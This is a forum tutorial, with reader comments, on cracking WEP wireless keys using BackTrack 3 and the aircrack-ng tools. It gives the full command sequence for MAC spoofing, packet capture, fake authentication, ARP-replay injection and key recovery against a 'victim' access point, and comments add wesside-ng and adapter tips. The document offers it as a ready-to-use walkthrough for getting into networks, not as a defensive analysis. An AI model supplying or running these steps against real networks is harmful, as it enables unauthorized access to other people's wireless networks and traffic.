Cracking Wep Keys With BackTrack
Cracking Wep Keys With BackTrack
ghost | 168287 Reads | This is my first tutorial…. I hope this helps all of you that just don’t know where to start or don’t know how to crack wep… What you will need
- 1 copy of BackTrack 3 newest release http://www.remote-exploit.org/backtrack.html (GOOGLE IT)
- 1 wireless router
- Laptop with wireless capabilities/wireless card – There are a few cards that can’t do the injection!!!
- A secure place to work (so you don’t disturb other AP’s)
In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request re injection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, or connecting to the AP.
Here are some things you need to know before you get confused When you see this (device) or (bssid) you DON’T put the ( )!!! (device) = Your wireless card *can be seen by typing in iwconfig EG: eth0, eth1, ath0, ath1 (bssid) = This is the victims bssid *when you start airodump-ng if there is a AP in range it will show up on the left side will look similar to 00:11:22:33:44:55
Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons home and system. Duble click the home icon, rigt click the blank white area and select create new Txt File name it exidous or what ever you want! click ok, now close the window.
Ok let's start!
Commands | Meaning
*open up 3 shell konsoles by clicking the little black box next to the start button.
* The first thing were going to do is stop the device aka ethernet card
airmon-ng stop ath0
* Now were going to put the wireless card down, so we can fake a mac adress (to see available wireless cards type, iwconfig
ifconfig (device) down
* Ok now just to make things simpler, so we don't have to hunt down what our Mac address is
macchanger –mac 00:11:22:33:44:55 (device)
* Now were going to start the wireless card *make it listen for AP's
airmon-ng start (device)
* Lets start seeing what AP's are there
airodump-ng (device)
* After you see all the AP's execute the following command to stop it and copy the bssid
CTRL+C Copy bssid of victom
* Now on to the victim's AP (were listening in for authentication packets
airodump-ng -c 6 -w Exidous –bssid (Bssid) (device)
* Lets get on with making more Data, and start the injection process
aireplay-ng -l 0 -a (bssid) -h 00:11:22:33:44:55 (device)
* Now were going to inject the router ***this sometimes takes a while to actually inject!
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)
* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV's for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IV's for 128 bit encryption
aircrack-ng -n 64 –bssid (bssid) exidous-01.cap
* Once you crack the wep key you wright it down, and reboot to windows. Now put it in the username and the password with out the :
EG: Wep Key = 33:C7:C6:09:30 When Entered into username and password it will look like this. 33C7C60930
I hope this tut. Helped!!! If so please send $$…. JK!!! Just leave a comment and rate it!
ghost 16 years ago
Good article. Though faking the mac address doesn't always work 100%. I set up a wireless network to play around with BT3, and I had trouble arp injecting with a fake mac address, then I switched it back to my original and presto, problem solved… A little advise for the article however, go more into detail with the commands, didn't feel like I got a good enough explanation of those. Good work though, keep it up.
ghost 16 years ago
Well thanks for taking the time to look at it.. and i am going to do a second article, but it will be on how to do Chop Chop method… and I will go a little further in detail about the commands, and other commands you can use! (Make it totally noob friendly)
Uber0n 16 years ago
This sure is useful information, but it doesn't explain how anything works. Just a step-by-step skiddie guide :|
ghost 16 years ago
nice one but you use the old methods backtack 3 has wesside-ng
wesside-ng -i (device)
ofcouse u have to put the card in monitor mode either using airmone-ng or wlanconfig
ghost 16 years ago
Great article, i was having a lot of trouble with backtrack (im not that much of a linux guy)…
ghost 15 years ago
Everybody take a good look, this is a quality example of spoon-feeding.
rated poor, for.. obvious reasons.
ghost 15 years ago
I just got my BackTrack 3 installed on my Eee PC 901 a few days ago. Too bad that the WLAN chip inside 901 isn't injection capable.
Blunt 15 years ago
Great but with step 7 -w exdious if your using a live cd you need to format a usb drive with ext.3 by using mkfs.ext /dev/(your device) so you can save your ivs
-w /dev/sda1 or what evre usb is mounted to sdc1 sda1 hda1 whatever
ghost 15 years ago
@ Blunt "Go smoke another one!" Your completely wrong. I have never installed babcktrack3. I have always ran it from cd or usb, And have never had a problem with step 7. All you have to do is open the home folder on desktop right click and make a txt file name it what ever u want… That is all.
ghost 14 years ago
I agree with Uber0n, I'd rather not be stuck knocking unwanted clients off my network.
ghost 14 years ago
what are some good usb wireless adapters that support injection? My netbook (Acer Aspire One) doesn't. PM if anyone knows any. In the mean time, I'll Google it. thanks.
ghost 14 years ago
it's late to be asking this, but did mirage find any usb's for injection that function well with acers?
also, it might be slower, but you can still crack it with acers. highly sudguest using password files though.
also, check into airbase for acer tops. it proves usefull sometimes.
Wish I could find an easier way to see what computer bssid's are connected to the router though….